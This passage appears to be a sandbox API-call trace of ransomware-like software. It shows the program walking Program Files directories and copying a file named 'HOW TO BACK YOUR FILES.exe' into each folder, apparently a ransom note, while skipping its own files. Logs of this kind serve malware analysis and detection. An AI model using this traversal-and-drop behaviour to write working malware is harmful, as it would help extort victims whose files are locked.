Framework\\v1.0\\Documentation") returned="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation" [0062.573] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation" | out: lpString1="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation") returned="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation" [0062.573] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.574] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\documentation\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.580] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.580] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6626d2b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56cd5e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56cd5e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.580] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.580] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.580] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033") returned="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033" [0062.580] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033" | out: lpString1="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033") returned="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033" [0062.580] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.580] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\documentation\\1033\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.586] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.586] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6626d2b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56cfbfc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56cfbfc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.586] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.586] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.586] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements") returned="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements" [0062.586] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements" | out: lpString1="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements") returned="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements" [0062.586] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.587] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\documentation\\1033\\license agreements\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.591] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.591] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6626d2b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56cfbfc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56cfbfc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.591] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.591] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.592] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft SQL Server Compact Edition", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition") returned="C:\\Program Files\\Microsoft SQL Server Compact Edition" [0062.592] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft SQL Server Compact Edition" | out: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition") returned="C:\\Program Files\\Microsoft SQL Server Compact Edition" [0062.592] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.592] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft sql server compact edition\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.598] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.598] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56cfbfc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56cfbfc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.598] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.598] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.598] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5") returned="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5" [0062.599] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5" | out: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5") returned="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5" [0062.599] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.599] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.607] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.607] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56d22120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56d22120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.607] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.607] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.607] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop") returned="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop" [0062.607] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop" | out: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop") returned="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop" [0062.607] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.607] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\desktop\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.612] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.612] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56d22120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56d22120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.612] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.612] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.612] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office") returned="C:\\Program Files\\Microsoft Office" [0062.612] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office" | out: lpString1="C:\\Program Files\\Microsoft Office") returned="C:\\Program Files\\Microsoft Office" [0062.612] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.612] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.617] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.617] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x56d48280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56d48280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.617] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.617] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.617] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Templates", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Templates") returned="C:\\Program Files\\Microsoft Office\\Templates" [0062.617] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Templates" | out: lpString1="C:\\Program Files\\Microsoft Office\\Templates") returned="C:\\Program Files\\Microsoft Office\\Templates" [0062.617] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.617] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\templates\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.625] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.625] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf59f9270, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x56d48280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56d48280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.626] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.626] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.626] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Templates\\Presentation Designs", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Templates\\Presentation Designs") returned="C:\\Program Files\\Microsoft Office\\Templates\\Presentation Designs" [0062.626] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Templates\\Presentation Designs" | out: lpString1="C:\\Program Files\\Microsoft Office\\Templates\\Presentation Designs") returned="C:\\Program Files\\Microsoft Office\\Templates\\Presentation Designs" [0062.626] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.626] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\Presentation Designs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\templates\\presentation designs\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.630] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.631] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\Presentation Designs\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56d48280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56d48280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.631] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.631] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.631] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Templates\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Templates\\1033") returned="C:\\Program Files\\Microsoft Office\\Templates\\1033" [0062.631] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Templates\\1033" | out: lpString1="C:\\Program Files\\Microsoft Office\\Templates\\1033") returned="C:\\Program Files\\Microsoft Office\\Templates\\1033" [0062.631] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.631] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.645] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.645] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf59f9270, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x56d6e3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56d6e3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.647] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.647] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.652] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE") returned="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE" [0062.653] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE" | out: lpString1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE") returned="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE" [0062.653] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.653] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\onenote\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.657] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.657] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc75c370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56d94540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56d94540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.657] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.657] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.658] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14") returned="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14" [0062.658] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14" | out: lpString1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14") returned="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14" [0062.658] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.658] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\onenote\\14\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.665] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.665] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc75c370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56dba6a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56dba6a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.665] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.665] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.665] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Stationery", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Stationery") returned="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Stationery" [0062.665] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Stationery" | out: lpString1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Stationery") returned="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Stationery" [0062.665] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.665] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Stationery\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\onenote\\14\\stationery\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.675] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.675] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Stationery\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc75c370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56dba6a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56dba6a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.675] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.675] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.676] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Notebook Templates", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Notebook Templates") returned="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Notebook Templates" [0062.676] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Notebook Templates" | out: lpString1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Notebook Templates") returned="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Notebook Templates" [0062.676] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.676] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Notebook Templates\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\onenote\\14\\notebook templates\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.681] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.682] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Notebook Templates\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc7a8630, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56de0800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56de0800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.682] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.682] 